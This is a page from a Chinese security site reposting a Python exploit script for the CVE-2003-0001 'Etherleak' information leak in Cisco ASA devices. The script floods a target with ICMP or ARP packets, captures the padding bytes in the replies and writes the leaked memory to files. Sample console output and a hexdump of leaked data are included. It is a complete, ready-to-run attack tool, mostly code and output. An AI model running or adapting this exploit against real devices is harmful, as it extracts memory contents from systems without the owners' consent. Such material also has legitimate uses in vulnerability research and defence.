首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco ASA < 8.4.4.68.2.5.32 Ethernet Information Leak
来源:vfocus.net 作者:prdelka 发布时间:2013-06-13  
#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads 
# ethernet frames with data which vary from one packet to another, 
# likely taken from kernel memory, system memory allocated to 
# the device driver, or a hardware buffer on its network interface 
# card. Exploit uses scapy with either ICMP or ARP requests as 
# this can trigger with either but ICMP can hit layer3 filtering 
# rules. Using ARP the padding appears to leak only fixed constant 
# values when exploited, ICMP leaks random bytes. 
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
#  -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
	print "!Killing"
	sys.exit(0)

def spawn(host,type):
	if type == 'arp':
		send(ARP(pdst=host),loop=1,nofilter=1)
	elif type == 'icmp':
		send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)		

if __name__ == "__main__":
	print "[ CVE-2003-0001 'Etherleak' exploit"
	signal.signal(signal.SIGINT,signalhandler)
	if len(sys.argv) < 4:
		print "[ No! Use with <host> <arp|icmp> <file>"
		sys.exit(1)
	type = sys.argv[2]
	if type == 'arp':
		pass
	elif type == 'icmp':
		pass
	else:
		print "Bad type!"
		sys.exit(0)
	pid = os.fork()
	if(pid):
		print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
		spawn(sys.argv[1],sys.argv[2])
	while True:
		if type == 'arp':
			myfilter = "host %s and arp" % sys.argv[1]
		elif type == 'icmp':
			myfilter = "host %s and icmp" % sys.argv[1]
		x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
		p = x[0]
		if type == 'arp':
			pad = p.getlayer(2)
		if type == 'icmp':
			pad = p.getlayer(4)
		leak =  str(pad)
		hexfull = binascii.b2a_hex(leak)
		file = "%s.hex"%sys.argv[3]
		fdesc = open(file,"a")
		fdesc.write(hexfull + "\n")
		fdesc.close()
		# 32 bits leaked here for me.
		if type == 'icmp':
			bytes = leak[9:13]
		elif type == 'arp':
			bytes = leak[10:14]
		fdesc = open(sys.argv[3],"ab")
		fdesc.write(bytes)
		fdesc.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MobileIron Virtual Smartphone
·WinRadius 2.11 - Denial of Ser
·Exim and Dovecot Insecure Conf
·Linux kernel perf_swevent_init
·Synactis PDF In-The-Box Connec
·Sami FTP Server 2.0.1 - RETR D
·Java Applet Driver Manager Pri
·Syslog Server 1.2.3 - Crash Po
·Java Web Start Double Quote In
·Ubiquiti airCam RTSP Service 1
·Sun Java Web Start Double Quot
·AXIS Media Control 6.2.10.11 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved